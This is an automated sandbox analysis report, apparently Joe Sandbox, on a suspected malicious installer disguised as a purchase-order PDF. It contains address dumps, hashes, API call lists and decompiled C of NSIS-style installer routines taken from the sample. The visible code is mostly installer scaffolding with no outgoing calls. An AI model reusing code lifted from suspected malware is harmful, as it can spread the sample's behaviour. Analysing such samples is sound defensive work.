                                            0x00406f60
                                            0x00406f62
                                            0x00406f65
                                            0x00406f68
                                            0x00406f6b
                                            0x00406f6d
                                            0x00406f6d
                                            0x00406f6d
                                            0x0040710a
                                            0x0040710a
                                            0x0040710d
                                            0x0040710d
                                            0x00000000
                                            0x0040710d
                                            0x00406e2f
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406eac
                                            0x00406df8
                                            0x00406dfc
                                            0x00407569
                                            0x004075e5
                                            0x004075ed
                                            0x004075f4
                                            0x004075f6
                                            0x004075fd
                                            0x00407601
                                            0x00407601
                                            0x00406e02
                                            0x00406e05
                                            0x00406e08
                                            0x00406e0c
                                            0x00406e0f
                                            0x00406e15
                                            0x00406e17
                                            0x00406e17
                                            0x00406e1a
                                            0x00000000
                                            0x00406e1a
                                            0x00406ea6
                                            0x00406daf
                                            0x00406be3
                                            0x00406be3
                                            0x00406bec
                                            0x004075fa
                                            0x004075fa
                                            0x00000000
                                            0x004075fa
                                            0x00406bf2
                                            0x00000000
                                            0x00406bfd
                                            0x00000000
                                            0x00000000
                                            0x00406c06
                                            0x00406c09
                                            0x00406c0c
                                            0x00406c10
                                            0x00000000
                                            0x00000000
                                            0x00406c16
                                            0x00406c19
                                            0x00406c1b
                                            0x00406c1c
                                            0x00406c1f
                                            0x00406c21
                                            0x00406c22
                                            0x00406c24
                                            0x00406c27
                                            0x00406c2c
                                            0x00406c31
                                            0x00406c3a
                                            0x00406c4d
                                            0x00406c50
                                            0x00406c5c
                                            0x00406c84
                                            0x00406c86
                                            0x00406c94
                                            0x00406c94
                                            0x00406c98
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406c88
                                            0x00406c88
                                            0x00406c8b
                                            0x00406c8c
                                            0x00406c8c
                                            0x00000000
                                            0x00406c88
                                            0x00406c62
                                            0x00406c67
                                            0x00406c67
                                            0x00406c70
                                            0x00406c78
                                            0x00406c7b
                                            0x00000000
                                            0x00406c81
                                            0x00406c81
                                            0x00000000
                                            0x00406c81
                                            0x00000000
                                            0x00406c9e
                                            0x00406c9e
                                            0x00406ca2
                                            0x0040754e
                                            0x00000000
                                            0x0040754e
                                            0x00406cab
                                            0x00406cbb
                                            0x00406cbe
                                            0x00406cc1
                                            0x00406cc1
                                            0x00406cc1
                                            0x00406cc4
                                            0x00406cc8
                                            0x00000000
                                            0x00000000
                                            0x00406cca
                                            0x00406cd0
                                            0x00406cfa
                                            0x00406d00
                                            0x00406d07
                                            0x00000000
                                            0x00406d07
                                            0x00406cd6
                                            0x00406cd9
                                            0x00406cde
                                            0x00406cde
                                            0x00406ce9
                                            0x00406cf1
                                            0x00406cf4
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406d39
                                            0x00406d3f
                                            0x00406d42
                                            0x00406d4f
                                            0x00406d57
                                            0x00000000
                                            0x00000000
                                            0x00406d0e
                                            0x00406d0e
                                            0x00406d12
                                            0x0040755d
                                            0x00000000
                                            0x0040755d
                                            0x00406d1e
                                            0x00406d29
                                            0x00406d29
                                            0x00406d29
                                            0x00406d2c
                                            0x00406d2f
                                            0x00406d32
                                            0x00406d37
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406ffe
                                            0x00407002
                                            0x00407020
                                            0x00407023
                                            0x0040702a
                                            0x0040702d
                                            0x00407030
                                            0x00407033
                                            0x00407036
                                            0x00407039
                                            0x0040703b
                                            0x00407042
                                            0x00407043
                                            0x00407045
                                            0x00407048
                                            0x0040704b
                                            0x0040704e
                                            0x0040704e
                                            0x00407053
                                            0x00000000
                                            0x00407053
                                            0x00407004
                                            0x00407007
                                            0x0040700a
                                            0x00407014
                                            0x00000000
                                            0x00000000
                                            0x00407068
                                            0x0040706c
                                            0x0040708f
                                            0x00407092
                                            0x00407095
                                            0x0040709f
                                            0x0040706e
                                            0x0040706e
                                            0x00407071
                                            0x00407074
                                            0x00407077
                                            0x00407084
                                            0x00407087
                                            0x00407087
                                            0x00000000
                                            0x00000000
                                            0x004070ab
                                            0x004070af
                                            0x00000000
                                            0x00000000
                                            0x004070b5
                                            0x004070b9
                                            0x00000000
                                            0x00000000
                                            0x004070bf
                                            0x004070c1
                                            0x004070c5
                                            0x004070c5
                                            0x004070c8
                                            0x004070cc
                                            0x00000000
                                            0x00000000
                                            0x0040711c
                                            0x00407120
                                            0x00407127
                                            0x0040712a
                                            0x0040712d
                                            0x00407137
                                            0x00000000
                                            0x00407137
                                            0x00407122
                                            0x00000000
                                            0x00000000
                                            0x00407143
                                            0x00407147
                                            0x0040714e
                                            0x00407151
                                            0x00407154
                                            0x00407149
                                            0x00407149
                                            0x00407149
                                            0x00407157
                                            0x0040715a
                                            0x0040715d
                                            0x0040715d
                                            0x00407160
                                            0x00407163
                                            0x00407166
                                            0x00407166
                                            0x00407169
                                            0x00407170
                                            0x00407175
                                            0x00000000
                                            0x00000000
                                            0x00407203
                                            0x00407203
                                            0x00407207
                                            0x004075a5
                                            0x00000000
                                            0x004075a5
                                            0x0040720d
                                            0x00407210
                                            0x00407213
                                            0x00407217
                                            0x0040721a
                                            0x00407220
                                            0x00407222
                                            0x00407222
                                            0x00407222
                                            0x00407225
                                            0x00407228
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00407286
                                            0x00407286
                                            0x0040728a
                                            0x004075b1
                                            0x00000000
                                            0x004075b1
                                            0x00407290
                                            0x00407293
                                            0x00407296
                                            0x0040729a
                                            0x0040729d
                                            0x004072a3
                                            0x004072a5
                                            0x004072a5
                                            0x004072a5
                                            0x004072a8
                                            0x00000000
                                            0x00000000
                                            0x00407056
                                            0x00407056
                                            0x00407059
                                            0x00000000
                                            0x00000000
                                            0x00407395
                                            0x00407399
                                            0x004073bb
                                            0x004073be
                                            0x004073c8
                                            0x00000000
                                            0x004073c8
                                            0x0040739b
                                            0x0040739e
                                            0x004073a2
                                            0x004073a5
                                            0x004073a5
                                            0x004073a8
                                            0x00000000
                                            0x00000000
                                            0x00407452
                                            0x00407456
                                            0x00407474
                                            0x00407474
                                            0x00407474
                                            0x0040747b
                                            0x00407482
                                            0x00407489
                                            0x00407489
                                            0x00000000
                                            0x00407489
                                            0x00407458
                                            0x0040745b
                                            0x0040745e
                                            0x00407461
                                            0x00407468
                                            0x004073ac
                                            0x004073ac
                                            0x004073af
                                            0x00000000
                                            0x00000000
                                            0x00407543
                                            0x00407546
                                            0x00000000
                                            0x00000000
                                            0x0040717d
                                            0x0040717f
                                            0x00407186
                                            0x00407187
                                            0x00407189
                                            0x0040718c
                                            0x00000000
                                            0x00000000
                                            0x00407194
                                            0x00407197
                                            0x0040719a
                                            0x0040719c
                                            0x0040719e
                                            0x0040719e
                                            0x0040719f
                                            0x004071a2
                                            0x004071a9
                                            0x004071ac
                                            0x004071ba
                                            0x00000000
                                            0x00000000
                                            0x00407490
                                            0x00407490
                                            0x00407493
                                            0x0040749a
                                            0x00000000
                                            0x00000000
                                            0x0040749f
                                            0x0040749f
                                            0x004074a3
                                            0x004075db
                                            0x00000000
                                            0x004075db
                                            0x004074a9
                                            0x004074ac
                                            0x004074af
                                            0x004074b3
                                            0x004074b6
                                            0x004074bc
                                            0x004074be
                                            0x004074be
                                            0x004074be
                                            0x004074c1
                                            0x004074c4
                                            0x004074c4
                                            0x004074c4
                                            0x004074c4
                                            0x004074c7
                                            0x004074c7
                                            0x004074cb
                                            0x0040752b
                                            0x0040752e
                                            0x00407533
                                            0x00407534
                                            0x00407536
                                            0x00407538
                                            0x0040753b
                                            0x00000000
                                            0x0040753b
                                            0x004074cd
                                            0x004074d3
                                            0x004074d6
                                            0x004074d9
                                            0x004074dc
                                            0x004074df
                                            0x004074e2
                                            0x004074e5
                                            0x004074e8
                                            0x004074eb
                                            0x004074ee
                                            0x00407507
                                            0x0040750a
                                            0x0040750d
                                            0x00407510
                                            0x00407514
                                            0x00407516
                                            0x00407516
                                            0x00407517
                                            0x0040751a
                                            0x004074f0
                                            0x004074f0
                                            0x004074f8
                                            0x004074fd
                                            0x004074ff
                                            0x00407502
                                            0x00407502
                                            0x0040751d
                                            0x00407524
                                            0x00000000
                                            0x00407526
                                            0x00000000
                                            0x00407526
                                            0x00000000
                                            0x004071c2
                                            0x004071c5
                                            0x004071fb
                                            0x0040732b
                                            0x0040732b
                                            0x0040732b
                                            0x0040732b
                                            0x0040732e
                                            0x0040732e
                                            0x00407331
                                            0x00407333
                                            0x004075bd
                                            0x00000000
                                            0x004075bd
                                            0x00407339
                                            0x0040733c
                                            0x00000000
                                            0x00000000
                                            0x00407342
                                            0x00407346
                                            0x00407349
                                            0x00407349
                                            0x00407349
                                            0x00000000
                                            0x00407349
                                            0x004071c7
                                            0x004071c9
                                            0x004071cb
                                            0x004071cd
                                            0x004071d0
                                            0x004071d1
                                            0x004071d3
                                            0x004071d5
                                            0x004071d8
                                            0x004071db
                                            0x004071f1
                                            0x004071f6
                                            0x0040722e
                                            0x0040722e
                                            0x00407232
                                            0x0040725e
                                            0x00407260
                                            0x00407267
                                            0x0040726a
                                            0x0040726d
                                            0x0040726d
                                            0x00407272
                                            0x00407272
                                            0x00407274
                                            0x00407277
                                            0x0040727e
                                            0x00407281
                                            0x004072ae
                                            0x004072ae
                                            0x004072b1
                                            0x004072b4
                                            0x00407328
                                            0x00407328
                                            0x00407328
                                            0x00000000
                                            0x00407328
                                            0x004072b6
                                            0x004072bc
                                            0x004072bf
                                            0x004072c2
                                            0x004072c5
                                            0x004072c8
                                            0x004072cb
                                            0x004072ce
                                            0x004072d1
                                            0x004072d4
                                            0x004072d7
                                            0x004072f0
                                            0x004072f2
                                            0x004072f5
                                            0x004072f6
                                            0x004072f9
                                            0x004072fb
                                            0x004072fe
                                            0x00407300
                                            0x00407302
                                            0x00407305
                                            0x00407307
                                            0x0040730a
                                            0x0040730e
                                            0x00407310
                                            0x00407310
                                            0x00407311
                                            0x00407314
                                            0x00407317
                                            0x004072d9
                                            0x004072d9
                                            0x004072e1
                                            0x004072e6
                                            0x004072e8
                                            0x004072eb
                                            0x004072eb
                                            0x0040731a
                                            0x00407321
                                            0x004072ab
                                            0x004072ab
                                            0x004072ab
                                            0x004072ab
                                            0x00000000
                                            0x00407323
                                            0x00000000
                                            0x00407323
                                            0x00407321
                                            0x00407234
                                            0x00407237
                                            0x00407239
                                            0x0040723c
                                            0x0040723f
                                            0x00407242
                                            0x00407244
                                            0x00407247
                                            0x0040724a
                                            0x0040724a
                                            0x0040724d
                                            0x0040724d
                                            0x00407250
                                            0x00407257
                                            0x0040722b
                                            0x0040722b
                                            0x0040722b
                                            0x0040722b
                                            0x00000000
                                            0x00407259
                                            0x00000000
                                            0x00407259
                                            0x00407257
                                            0x004071dd
                                            0x004071e0
                                            0x004071e2
                                            0x004071e5
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004070cf
                                            0x004070cf
                                            0x004070d3
                                            0x00407599
                                            0x00000000
                                            0x00407599
                                            0x004070d9
                                            0x004070dc
                                            0x004070df
                                            0x004070e2
                                            0x004070e4
                                            0x004070e4
                                            0x004070e4
                                            0x004070e7
                                            0x004070ea
                                            0x004070ed
                                            0x004070f0
                                            0x004070f3
                                            0x004070f6
                                            0x004070f7
                                            0x004070f9
                                            0x004070f9
                                            0x004070f9
                                            0x004070fc
                                            0x004070ff
                                            0x00407102
                                            0x00407105
                                            0x00407105
                                            0x00407105
                                            0x00407108
                                            0x00000000
                                            0x00000000
                                            0x0040734c
                                            0x0040734c
                                            0x0040734c
                                            0x00407350
                                            0x00000000
                                            0x00000000
                                            0x00407356
                                            0x00407359
                                            0x0040735c
                                            0x0040735f
                                            0x00407361
                                            0x00407361
                                            0x00407361
                                            0x00407364
                                            0x00407367
                                            0x0040736a
                                            0x0040736d
                                            0x00407370
                                            0x00407373
                                            0x00407374
                                            0x00407376
                                            0x00407376
                                            0x00407376
                                            0x00407379
                                            0x0040737c
                                            0x0040737f
                                            0x00407382
                                            0x00407385
                                            0x00407389
                                            0x0040738b
                                            0x0040738e
                                            0x00000000
                                            0x00407390
                                            0x00000000
                                            0x00407390
                                            0x0040738e
                                            0x004075c3
                                            0x00000000
                                            0x00000000
                                            0x00406bf2

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                            • Instruction ID: 02c1e40b0c9780dd067322b7733c474732bd0f187a49f53fd7fd3c108ee94619
                                            • Opcode Fuzzy Hash: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                            • Instruction Fuzzy Hash: 7CF15570D04229CBDF28CFA8C8946ADBBB0FF44305F24816ED456BB281D7386A86DF45
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0040699E(WCHAR* _a4) {
                                            				void* _t2;
                                            
                                            				_t2 = FindFirstFileW(_a4, 0x426798); // executed
                                            				if(_t2 == 0xffffffff) {
                                            					return 0;
                                            				}
                                            				FindClose(_t2);
                                            				return 0x426798;
                                            			}




                                            0x004069a9
                                            0x004069b2
                                            0x00000000
                                            0x004069bf
                                            0x004069b5
                                            0x00000000

                                            APIs
                                            • FindFirstFileW.KERNEL32(?,00426798,00425F50,00406088,00425F50,00425F50,00000000,00425F50,00425F50, 4Tu.Tu,?,75542EE0,00405D94,?,75543420,75542EE0), ref: 004069A9
                                            • FindClose.KERNEL32(00000000), ref: 004069B5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: Find$CloseFileFirst
                                            • String ID:
                                            • API String ID: 2295610775-0
                                            • Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                            • Instruction ID: 0ca7534fdffec89160a31ceabb6ef5ff718bfc83d1618d69d17f9e635378cbc3
                                            • Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                            • Instruction Fuzzy Hash: 5ED012B15192205FC34057387E0C84B7A989F563317268A36B4AAF11E0CB348C3297AC
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetSystemInfo.KERNEL32(?), ref: 024507F7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1089171986.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_PO-230821_pdf.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: InfoSystem
                                            • String ID:
                                            • API String ID: 31276548-0
                                            • Opcode ID: fa2979548fe31277adddc85b40786a5f89b5b758f8f4ce622a53a7dd496667a7
                                            • Instruction ID: c33e648b84fbaa2503fdc8958275025bfdb0f0235235a6cd80478d8b95f76a18
                                            • Opcode Fuzzy Hash: fa2979548fe31277adddc85b40786a5f89b5b758f8f4ce622a53a7dd496667a7
                                            • Instruction Fuzzy Hash: BEF0A775D1411CABDB08E6B89845ABE77ACDF0C300F10556EDE56E2241D538854186A0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 143 403d17-403d2f call 406a35 146 403d31-403d41 call 4065af 143->146 147 403d43-403d7a call 406536 143->147 155 403d9d-403dc6 call 403fed call 40603f 146->155 151 403d92-403d98 lstrcatW 147->151 152 403d7c-403d8d call 406536 147->152 151->155 152->151 161 403e58-403e60 call 40603f 155->161 162 403dcc-403dd1 155->162 167 403e62-403e69 call 4066a5 161->167 168 403e6e-403e93 LoadImageW 161->168 162->161 163 403dd7-403dff call 406536 162->163 163->161 173 403e01-403e05 163->173 167->168 171 403f14-403f1c call 40140b 168->171 172 403e95-403ec5 RegisterClassW 168->172 186 403f26-403f31 call 403fed 171->186 187 403f1e-403f21 171->187 176 403fe3 172->176 177 403ecb-403f0f SystemParametersInfoW CreateWindowExW 172->177 174 403e17-403e23 lstrlenW 173->174 175 403e07-403e14 call 405f64 173->175 181 403e25-403e33 lstrcmpiW 174->181 182 403e4b-403e53 call 405f37 call 406668 174->182 175->174 180 403fe5-403fec 176->180 177->171 181->182 185 403e35-403e3f GetFileAttributesW 181->185 182->161 189 403e41-403e43 185->189 190 403e45-403e46 call 405f83 185->190 196 403f37-403f51 ShowWindow call 4069c5 186->196 197 403fba-403fc2 call 40579d 186->197 187->180 189->182 189->190 190->182 204 403f53-403f58 call 4069c5 196->204 205 403f5d-403f6f GetClassInfoW 196->205 202 403fc4-403fca 197->202 203 403fdc-403fde call 40140b 197->203 202->187 210 403fd0-403fd7 call 40140b 202->210 203->176 204->205 208 403f71-403f81 GetClassInfoW RegisterClassW 205->208 209 403f87-403faa DialogBoxParamW call 40140b 205->209 208->209 213 403faf-403fb8 call 403c67 209->213 210->187 213->180
                                            C-Code - Quality: 96%
                                            			E00403D17(void* __eflags) {
                                            				intOrPtr _v4;
                                            				intOrPtr _v8;
                                            				int _v12;
                                            				void _v16;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				intOrPtr* _t22;
                                            				void* _t30;
                                            				void* _t32;
                                            				int _t33;
                                            				void* _t36;
                                            				int _t39;
                                            				int _t40;
                                            				int _t44;
                                            				short _t63;
                                            				WCHAR* _t65;
                                            				signed char _t69;
                                            				WCHAR* _t76;
                                            				intOrPtr _t82;
                                            				WCHAR* _t87;
                                            
                                            				_t82 =  *0x42a270;
                                            				_t22 = E00406A35(2);
                                            				_t90 = _t22;
                                            				if(_t22 == 0) {
                                            					_t76 = 0x423748;
                                            					L"1033" = 0x30;
                                            					 *0x437002 = 0x78;
                                            					 *0x437004 = 0;
                                            					E00406536(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423748, 0);
                                            					__eflags =  *0x423748;
                                            					if(__eflags == 0) {
                                            						E00406536(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423748, 0);
                                            					}
                                            					lstrcatW(L"1033", _t76);
                                            				} else {
                                            					E004065AF(L"1033",  *_t22() & 0x0000ffff);
                                            				}
                                            				E00403FED(_t78, _t90);
                                            				_t86 = L"C:\\Users\\Alvin\\AppData\\Local\\Temp";
                                            				 *0x42a2e0 =  *0x42a278 & 0x00000020;
                                            				 *0x42a2fc = 0x10000;
                                            				if(E0040603F(_t90, L"C:\\Users\\Alvin\\AppData\\Local\\Temp") != 0) {
                                            					L16:
                                            					if(E0040603F(_t98, _t86) == 0) {
                                            						E004066A5(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
                                            					}
                                            					_t30 = LoadImageW( *0x42a260, 0x67, 1, 0, 0, 0x8040); // executed
                                            					 *0x429248 = _t30;
                                            					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                                            						L21:
                                            						if(E0040140B(0) == 0) {
                                            							_t32 = E00403FED(_t78, __eflags);
                                            							__eflags =  *0x42a300;
                                            							if( *0x42a300 != 0) {
                                            								_t33 = E0040579D(_t32, 0);
                                            								__eflags = _t33;
                                            								if(_t33 == 0) {
                                            									E0040140B(1);
                                            									goto L33;
                                            								}
                                            								__eflags =  *0x42922c;
                                            								if( *0x42922c == 0) {
                                            									E0040140B(2);
                                            								}
                                            								goto L22;
                                            							}
                                            							ShowWindow( *0x423728, 5); // executed
                                            							_t39 = E004069C5("RichEd20"); // executed
                                            							__eflags = _t39;
                                            							if(_t39 == 0) {
                                            								E004069C5("RichEd32");
                                            							}
                                            							_t87 = L"RichEdit20W";
                                            							_t40 = GetClassInfoW(0, _t87, 0x429200);
                                            							__eflags = _t40;
                                            							if(_t40 == 0) {
                                            								GetClassInfoW(0, L"RichEdit", 0x429200);
                                            								 *0x429224 = _t87;
                                            								RegisterClassW(0x429200);
                                            							}
                                            							_t44 = DialogBoxParamW( *0x42a260,  *0x429240 + 0x00000069 & 0x0000ffff, 0, E004040C5, 0); // executed
                                            							E00403C67(E0040140B(5), 1);
                                            							return _t44;
                                            						}
                                            						L22:
                                            						_t36 = 2;
                                            						return _t36;
                                            					} else {
                                            						_t78 =  *0x42a260;
                                            						 *0x429204 = E00401000;
                                            						 *0x429210 =  *0x42a260;
                                            						 *0x429214 = _t30;
                                            						 *0x429224 = 0x40a3b4;
                                            						if(RegisterClassW(0x429200) == 0) {
                                            							L33:
                                            							__eflags = 0;
                                            							return 0;
                                            						}
                                            						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                                            						 *0x423728 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a260, 0);
                                            						goto L21;
                                            					}
                                            				} else {
                                            					_t78 =  *(_t82 + 0x48);
                                            					_t92 = _t78;
                                            					if(_t78 == 0) {
                                            						goto L16;
                                            					}
                                            					_t76 = 0x428200;
                                            					E00406536(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a298 + _t78 * 2,  *0x42a298 +  *(_t82 + 0x4c) * 2, 0x428200, 0);
                                            					_t63 =  *0x428200; // 0x46
                                            					if(_t63 == 0) {
                                            						goto L16;
                                            					}
                                            					if(_t63 == 0x22) {
                                            						_t76 = 0x428202;
                                            						 *((short*)(E00405F64(0x428202, 0x22))) = 0;
                                            					}
                                            					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                                            					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                                            						L15:
                                            						E00406668(_t86, E00405F37(_t76));
                                            						goto L16;
                                            					} else {
                                            						_t69 = GetFileAttributesW(_t76);
                                            						if(_t69 == 0xffffffff) {
                                            							L14:
                                            							E00405F83(_t76);
                                            							goto L15;
                                            						}
                                            						_t98 = _t69 & 0x00000010;
                                            						if((_t69 & 0x00000010) != 0) {
                                            							goto L15;
                                            						}
                                            						goto L14;
                                            					}
                                            				}
                                            			}
























                                            0x00403d1d
                                            0x00403d26
                                            0x00403d2d
                                            0x00403d2f
                                            0x00403d43
                                            0x00403d55
                                            0x00403d5e
                                            0x00403d67
                                            0x00403d6e
                                            0x00403d73
                                            0x00403d7a
                                            0x00403d8d
                                            0x00403d8d
                                            0x00403d98
                                            0x00403d31
                                            0x00403d3c
                                            0x00403d3c
                                            0x00403d9d
                                            0x00403da7
                                            0x00403db0
                                            0x00403db5
                                            0x00403dc6
                                            0x00403e58
                                            0x00403e60
                                            0x00403e69
                                            0x00403e69
                                            0x00403e7f
                                            0x00403e85
                                            0x00403e93
                                            0x00403f14
                                            0x00403f1c
                                            0x00403f26
                                            0x00403f2b
                                            0x00403f31
                                            0x00403fbb
                                            0x00403fc0
                                            0x00403fc2
                                            0x00403fde
                                            0x00000000
                                            0x00403fde
                                            0x00403fc4
                                            0x00403fca
                                            0x00403fd2
                                            0x00403fd2
                                            0x00000000
                                            0x00403fca
                                            0x00403f3f
                                            0x00403f4a
                                            0x00403f4f
                                            0x00403f51
                                            0x00403f58
                                            0x00403f58
                                            0x00403f63
                                            0x00403f6b
                                            0x00403f6d
                                            0x00403f6f
                                            0x00403f78
                                            0x00403f7b
                                            0x00403f81
                                            0x00403f81
                                            0x00403fa0
                                            0x00403fb1
                                            0x00000000
                                            0x00403fb6
                                            0x00403f1e
                                            0x00403f20
                                            0x00000000
                                            0x00403e95
                                            0x00403e95
                                            0x00403ea1
                                            0x00403eab
                                            0x00403eb1
                                            0x00403eb6
                                            0x00403ec5
                                            0x00403fe3
                                            0x00403fe3
                                            0x00000000
                                            0x00403fe3
                                            0x00403ed4
                                            0x00403f0f
                                            0x00000000
                                            0x00403f0f
                                            0x00403dcc
                                            0x00403dcc
                                            0x00403dcf
                                            0x00403dd1
                                            0x00000000
                                            0x00000000
                                            0x00403ddf
                                            0x00403df1
                                            0x00403df6
                                            0x00403dff
                                            0x00000000
                                            0x00000000
                                            0x00403e05
                                            0x00403e07
                                            0x00403e14
                                            0x00403e14
                                            0x00403e1d
                                            0x00403e23
                                            0x00403e4b
                                            0x00403e53
                                            0x00000000
                                            0x00403e35
                                            0x00403e36
                                            0x00403e3f
                                            0x00403e45
                                            0x00403e46
                                            0x00000000
                                            0x00403e46
                                            0x00403e41
                                            0x00403e43
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00403e43
                                            0x00403e23

                                            APIs
                                              • Part of subcall function 00406A35: GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                              • Part of subcall function 00406A35: GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                            • lstrcatW.KERNEL32(1033,00423748), ref: 00403D98
                                            • lstrlenW.KERNEL32(Fosklcks,?,?,?,Fosklcks,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,75543420), ref: 00403E18
                                            • lstrcmpiW.KERNEL32(?,.exe,Fosklcks,?,?,?,Fosklcks,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403E2B
                                            • GetFileAttributesW.KERNEL32(Fosklcks,?,00000000,?), ref: 00403E36
                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 00403E7F
                                              • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                            • RegisterClassW.USER32(00429200), ref: 00403EBC
                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403ED4
                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403F09
                                            • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403F3F
                                            • GetClassInfoW.USER32(00000000,RichEdit20W,00429200), ref: 00403F6B
                                            • GetClassInfoW.USER32(00000000,RichEdit,00429200), ref: 00403F78
                                            • RegisterClassW.USER32(00429200), ref: 00403F81
                                            • DialogBoxParamW.USER32(?,00000000,004040C5,00000000), ref: 00403FA0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                            • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$Fosklcks$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                            • API String ID: 1975747703-880617333
                                            • Opcode ID: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                                            • Instruction ID: e235badc60aeba35c86cf297cd954ec43a22164425911800af60bc979c7621a1
